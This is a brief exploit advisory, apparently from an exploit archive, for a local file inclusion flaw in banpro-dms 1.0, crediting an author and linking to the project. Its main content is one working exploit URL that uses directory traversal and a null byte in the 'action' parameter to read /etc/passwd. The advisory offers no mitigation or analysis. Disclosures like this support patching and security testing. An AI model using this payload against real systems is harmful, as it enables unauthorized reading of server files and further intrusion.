|
banpro-dms 1.0 local file inclusion vulnerability
download http://sourceforge.net/projects/banprodms
author muuratsalo
contact muuratsalo[at]gmail.com
exploit
http://localhost/DMS/index.php?action=../../../../../../../../../../etc/passwd%00